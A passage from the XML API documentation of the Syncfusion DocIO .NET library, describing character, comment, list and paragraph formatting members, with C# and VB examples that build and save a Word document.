                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text
                Dim text As IWTextRange = paragraph.AppendText("Numbers to describe tabular number spacing 0123456789")
                text.CharacterFormat.FontName = "Calibri"
                'Set number spacing
                text.CharacterFormat.NumberSpacing = NumberSpacingType.Tabular
                paragraph = section.AddParagraph()
                text = paragraph.AppendText("Numbers to describe proportional number spacing 0123456789")
                text.CharacterFormat.FontName = "Calibri"
                'Set number spacing
                text.CharacterFormat.NumberSpacing = NumberSpacingType.Proportional
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.StylisticSet">
            <summary>
            Gets or sets the stylistic set type(defines the look of the text, based on the font used) for the text.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StylisticSetType"/> member that specifies the type of stylistic set.</value>
            <example> 
            <para>The following example illustrates how to set number spacing for text.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text
                IWTextRange text = paragraph.AppendText("Text to describe stylistic sets");
                text.CharacterFormat.FontName = "Gabriola";
                //Set stylistic set
                text.CharacterFormat.StylisticSet = StylisticSetType.StylisticSet06;
                paragraph = section.AddParagraph();
                //Add new text
                text = paragraph.AppendText("Text to describe stylistic sets");
                text.CharacterFormat.FontName = "Gabriola";
                //Set stylistic set
                text.CharacterFormat.StylisticSet = StylisticSetType.StylisticSet15;
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text
                Dim text As IWTextRange = paragraph.AppendText("Text to describe stylistic sets")
                text.CharacterFormat.FontName = "Gabriola"
                'Set stylistic set
                text.CharacterFormat.StylisticSet = StylisticSetType.StylisticSet06
                paragraph = section.AddParagraph()
                'Add new text
                text = paragraph.AppendText("Text to describe stylistic sets")
                text.CharacterFormat.FontName = "Gabriola"
                'Set stylistic set
                text.CharacterFormat.StylisticSet = StylisticSetType.StylisticSet15
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCharacterFormat.XmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WCommentFormat">
            <summary>
            Represent a comment properties.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentFormat.m_strUser">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentFormat.m_strUserInitials">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentFormat.m_iBookmarkStartOffset">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentFormat.m_iBookmarkEndOffset">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentFormat.m_iTagBkmk">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WCommentFormat.m_iPosition">
            <summary>
            Text position of the comment.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentFormat.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCommentFormat"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentFormat.Clone(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Creates a new object that is a copy of the current instance.
            </summary>
            <returns>
            A new object that is a copy of this instance.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentFormat.FindTagBkmk(Syncfusion.DocIO.DLS.IWordDocument,System.String)">
            <summary>
            
            </summary>
            <param name="doc"></param>
            <param name="tagBkmk"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentFormat.IsCommentExists(Syncfusion.DocIO.DLS.WTextBody,System.String)">
            <summary>
            Determines whether the comment exists or not.
            </summary>
            <param name="body"></param>
            <param name="tagBkmk"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCommentFormat.UpdateTagBkmk">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.Date">
            <summary>
            Gets or sets the date.
            </summary>
            <value>
            The date.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.UserInitials">
            <summary>
            Gets or sets the user initials.
            </summary>
            <value>The user initials.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.User">
            <summary>
            Gets or sets the user.
            </summary>
            <value>The user.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.BookmarkStartOffset">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.BookmarkEndOffset">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.TagBkmk">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.Position">
            <summary>
            Gets/sets the text position of the comment.
            </summary>
            <value>The position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCommentFormat.StartTextPos">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TagIdRandomizer">
            <summary>
            Class which provides WCommentFormat class with random tag bookmark id.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TagIdRandomizer.m_ids">
            <summary>
            Contains changed IDs and values they where change on.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TagIdRandomizer.m_noneChangeIds">
            <summary>
            Contains the comment ids, which can't be changed
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TagIdRandomizer.m_changedIds">
            <summary>
            Contains the old id(s) and the new id(s)
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TagIdRandomizer.GetId(System.Int32)">
            <summary>
            Gets the id for comment marker.
            </summary>
            <param name="currentId">The current id.</param>
            <param name="newId">if set to <c>true</c> create new id.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TagIdRandomizer.IsValidId(System.Int32)">
            <summary>
            Determines whether the new id is valid.
            </summary>
            <param name="newId">The new id.</param>
            <returns>
            	if it specifies a valid id, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TagIdRandomizer.GetMarkerId(System.Int32,System.Boolean)">
            <summary>
            Gets the marker id.
            </summary>
            <param name="currentId">The current id.</param>
            <param name="newId">if it creates new id, set to <c>true</c>.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TagIdRandomizer.Instance">
            <summary>
            Gets the instance of Random class.
            </summary>
            <value>The instance.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TagIdRandomizer.ChangedIds">
            <summary>
            Gets the collection of ids and new ids they were changed on.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TagIdRandomizer.Identificators">
            <summary>
            Gets the collection of ids and new ids they were changed on.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TagIdRandomizer.NoneChangeIds">
            <summary>
            Gets the collection of ids and new ids they were changed on.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WListFormat">
            <summary>
            Represents the list formatting options.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.ListLevelNumberKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.ListTypeKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.CustomStyleNameKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.RestartKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.LfoStyleNameKey">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.NewListLevelNumKey">
            <summary>
            Changed list level number key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.NewStyleNameKey">
            <summary>
            Changed list style name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.NewLfoStyleNameKey">
            <summary>
            Changed Lfo style name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.DEF_START_LISTID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.m_currentStyleName">
            <summary>
            Currently used list style
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WListFormat.m_currLevelNumber">
            <summary>
            Current level number
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.#ctor(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WListFormat"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> instance.
            </summary>
            <param name="owner">The owner entity of the current list format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.WParagraphStyle)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WListFormat"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance along with paragraph style.
            </summary>
            <param name="doc"><see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
            <param name="owner">The owner paragraph style for the current list format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.WNumberingStyle)">
            <summary>
            
            </summary>
            <param name="doc"></param>
            <param name="owner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.WTableStyle)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WListFormat"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.CloneListRelationsTo(Syncfusion.DocIO.DLS.WordDocument,System.String)">
            <summary>
            Clones the list relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.ImportListFormat(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Imports list format from source to destination.
            </summary>
            <param name="srcListFormat"></param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.IncreaseIndentLevel">
            <summary>
            Increase the current level indent.
            </summary>
            <remarks>List level must be less 8 and greater then 0</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.DecreaseIndentLevel">
            <summary>
            Decrease the current level indent.
            </summary>
            <remarks>List level must be less 8 and greater then 0</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.ContinueListNumbering">
            <summary>
            Continues the list numbering from the previous list.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.ApplyStyle(System.String)">
            <summary>
            Applies the specified style.
            </summary>
            <param name="styleName">A <c>String</c> that represents the name of the style to apply.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.ApplyDefBulletStyle">
            <summary>
            Apply default bullet style for current list's owner paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.ApplyDefNumberedStyle">
            <summary>
            Apply default numbered style for current list's owner paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.RemoveList">
            <summary>
            Removes the list from current paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.ClearFormatting">
            <summary>
            To Clears the list format applied
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WListFormat.Compare(Syncfusion.DocIO.DLS.WListFormat)">
            <summary>
            Compares the list format with current list format
            </summary>
            <param name="listFormat">The List format</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.ListLevelNumber">
            <summary>
            Gets or sets  current list nesting level. 
            </summary>
            <remarks>List level must be less 8 and greater then 0</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.ListType">
            <summary>
            Gets type of the list format. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.RestartNumbering">
            <summary>
            Gets or sets a value indicating whether numbering of the list must restart from previous list.
            </summary>
            <value><b>True</b>, if the list number must restart from previous list; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.CustomStyleName">
            <summary>
            Gets the name of custom style. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.CurrentListStyle">
            <summary>
            Gets current custom list style. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.CurrentListLevel">
            <summary>
            Gets the current custom list level.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.LFOStyleName">
            <summary>
            Gets or sets the name of the LFO style.
            </summary>
            <value>The name of the LFO style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.OwnerParagraph">
            <summary>
            Gets the owner paragraph.
            </summary>
            <value>The owner paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.NewStyleName">
            <summary>
            Gets or sets the new name of the style for list format.
            </summary>
            <value>The new name of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.NewLfoStyleName">
            <summary>
            Gets or sets the new name of the style for list format.
            </summary>
            <value>The new name of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.NewListLevelNumber">
            <summary>
            Gets or sets the new list level number for list format.
            </summary>
            <value>The new list level number.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.IsListRemoved">
            <summary>
            Gets/sets IsListRemoved flag.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WListFormat.IsEmptyList">
            <summary>
            Gets/sets the value which specifies whether this is empty list.
            Such situation occurs when style (which doesn't have)
            list format inherits style which have list.
            </summary>
            <value>The is empty list.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WParagraphFormat">
            <summary>
            Represents the formatting options of the paragraph in the Word document.
            </summary>
            <example>The following example illustrates how to apply various paragraph formatting options.
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text to the paragraph
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " +
                "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.");
                //After spacing, back color, borders, contextual spacing
                paragraph.ParagraphFormat.AfterSpacing = 18f;
                paragraph.ParagraphFormat.BackColor = Color.LightGray;
                paragraph.ParagraphFormat.Bidi = true;
                paragraph.ParagraphFormat.Borders.BorderType = BorderStyle.Dot;
                paragraph.ParagraphFormat.Borders.Color = Color.Maroon;
                paragraph.ParagraphFormat.Borders.LineWidth = 0.5f;
                paragraph.ParagraphFormat.ContextualSpacing = true;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " +
                "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.");            
                //column break, firstline indent, alignment
                paragraph.ParagraphFormat.ColumnBreakAfter = true;
                paragraph.ParagraphFormat.FirstLineIndent = 12;
                paragraph.ParagraphFormat.HorizontalAlignment = HorizontalAlignment.JustifyHigh;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " +
                "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.");            
                //Hanging indent, keep, left indent, line spacing, keep follow
                paragraph.ParagraphFormat.FirstLineIndent = -12;
                paragraph.ParagraphFormat.Keep = true;
                paragraph.ParagraphFormat.LeftIndent = 10;
                paragraph.ParagraphFormat.LineSpacing = 2;
                paragraph.ParagraphFormat.LineSpacingRule = LineSpacingRule.AtLeast;
                paragraph.ParagraphFormat.KeepFollow = true;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " +
                "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.");            
                //Mirror indent, outline level, page break
                paragraph.ParagraphFormat.MirrorIndents = true;
                paragraph.ParagraphFormat.OutlineLevel = OutlineLevel.Level2;
                paragraph.ParagraphFormat.PageBreakAfter = true;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " +
                "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.");            
                //Right indent, auto spacing
                paragraph.ParagraphFormat.RightIndent = 10;
                paragraph.ParagraphFormat.SpaceAfterAuto = true;
                paragraph.ParagraphFormat.SpaceBeforeAuto = true;
                paragraph = section.AddParagraph();
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " +
                "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.");
                //Auto hyphens, window control, before spacing, page break
                paragraph.ParagraphFormat.SuppressAutoHyphens = true;
                paragraph.ParagraphFormat.WidowControl = true;
                paragraph.ParagraphFormat.BeforeSpacing = 18f;
                paragraph.ParagraphFormat.PageBreakBefore = true;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text to the paragraph
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " &amp; "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.")
                'After spacing, back color, borders, contextual spacing
                paragraph.ParagraphFormat.AfterSpacing = 18.0F
                paragraph.ParagraphFormat.BackColor = Color.LightGray
                paragraph.ParagraphFormat.Bidi = True
                paragraph.ParagraphFormat.Borders.BorderType = BorderStyle.Dot
                paragraph.ParagraphFormat.Borders.Color = Color.Maroon
                paragraph.ParagraphFormat.Borders.LineWidth = 0.5F
                paragraph.ParagraphFormat.ContextualSpacing = True
                paragraph = section.AddParagraph()
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " &amp; "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.")
                'column break, firstline indent, alignment
                paragraph.ParagraphFormat.ColumnBreakAfter = True
                paragraph.ParagraphFormat.FirstLineIndent = 12
                paragraph.ParagraphFormat.HorizontalAlignment = HorizontalAlignment.JustifyHigh
                paragraph = section.AddParagraph()
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " &amp; "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.")
                'Hanging indent, keep, left indent, line spacing, keep follow
                paragraph.ParagraphFormat.FirstLineIndent = -12
                paragraph.ParagraphFormat.Keep = True
                paragraph.ParagraphFormat.LeftIndent = 10
                paragraph.ParagraphFormat.LineSpacing = 2
                paragraph.ParagraphFormat.LineSpacingRule = LineSpacingRule.AtLeast
                paragraph.ParagraphFormat.KeepFollow = True
                paragraph = section.AddParagraph()
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " &amp; "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.")
                'Mirror indent, outline level, page break
                paragraph.ParagraphFormat.MirrorIndents = True
                paragraph.ParagraphFormat.OutlineLevel = OutlineLevel.Level2
                paragraph.ParagraphFormat.PageBreakAfter = True
                paragraph = section.AddParagraph()
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " &amp; "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.")
                'Right indent, auto spacing
                paragraph.ParagraphFormat.RightIndent = 10
                paragraph.ParagraphFormat.SpaceAfterAuto = True
                paragraph.ParagraphFormat.SpaceBeforeAuto = True
                paragraph = section.AddParagraph()
                paragraph.AppendText("Paragraphs are the basic elements of the Word document. It can contain text and images. " &amp; "Paragraphs are the basic elements of the Word document. It can contain text and images. Paragraphs are the basic elements of the Word document. It can contain text and images.")
                'Auto hyphens, window control, before spacing, page break
                paragraph.ParagraphFormat.SuppressAutoHyphens = True
                paragraph.ParagraphFormat.WidowControl = True
                paragraph.ParagraphFormat.BeforeSpacing = 18.0F
                paragraph.ParagraphFormat.PageBreakBefore = True
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraphFormat.LineSpacingKey">
            <summary>
            
            </summary>    
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraphFormat.m_paraProps">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraphFormat.m_xmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraphFormat"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraphFormat"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="document">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.IsInFrame">
            <summary>
            Determine whether the paragraph format is have frame properties
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.IsFrameXAlign(System.Int16)">
            <summary>
            Determine whether the frame is have Horizontal alignment
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.IsFrameYAlign(System.Int16)">
            <summary>
            Determine whether the frame is have Vertical alignment
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propKey">The prop key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateParaFormat(System.Int32)">
            <summary>
            Updates the paragraph format.
            </summary>
            <param name="propKey">The prop key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ContainsBordersSprm">
            <summary>
            Determines whether the specified option key contains SPRM.
            </summary>
            <param name="optionKey">The option key.</param>
            <returns>
            	<c>true</c> if the specified option key contains SPRM; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.GetSpacingValue(System.Int32)">
            <summary>
            Gets the spacing values of paragraph format from the MS Word specific inheritance hierarchy.
            </summary>
            <param name="key">The key to get the value.</param>
            <returns>The float that specifies the spacing value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.GetParagraphFormat(System.Int32)">
            <summary>
            Gets the Paragraph format from the MS Word specific inheritance hierarchy.
            </summary>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.CheckParaProps">
            <summary>
            Checks the paragraph props.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propKey">The prop key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateParaProps(System.Int32,System.Object)">
            <summary>
            Updates the paragraph props.
            </summary>
            <param name="propKey">The prop key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ChangeTabs(Syncfusion.DocIO.DLS.TabCollection)">
            <summary>
            Changes the tabs.
            </summary>
            <param name="tabs">The tabs.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.CreateTabsCol">
            <summary>
            Creates the new collection of tabs.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.UpdateDefaultFormats">
            <summary>
            Updates the default formats.
            Updates the document default formattings while cloning the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ContainsValue(System.Int32)">
            <summary>
            Determines whether the specified key contains value.
            </summary>
            <param name="key">The key.</param>
            <returns>
            	<c>true</c> if the specified key contains value; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.IsPreviousParagraphInSameFrame">
            <summary>
            Determine whether the Current paragraph is in Same Frame of the previous paragraph
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.IsNextParagraphInSameFrame">
            <summary>
            Determine whether the Next paragraph is in Same Frame of the current paragraph
            </summary>
            <param name="paragraph"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.IsInSameFrame(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Determine whether the current paragraph is having a same frame properties
            </summary>
            <param name="paraFormat"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.SetDefaultProperties">
            <summary>
            Sets the default properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.EnsureComposites">
            <summary>
            Ensures the composites.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.GetDefComposite(System.Int32)">
            <summary>
            Gets the composite values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ImportContainer(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the container.
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphFormat.ImportXmlProps(Syncfusion.DocIO.DLS.WParagraphFormat)">
            <summary>
            Imports the XML properties.
            </summary>
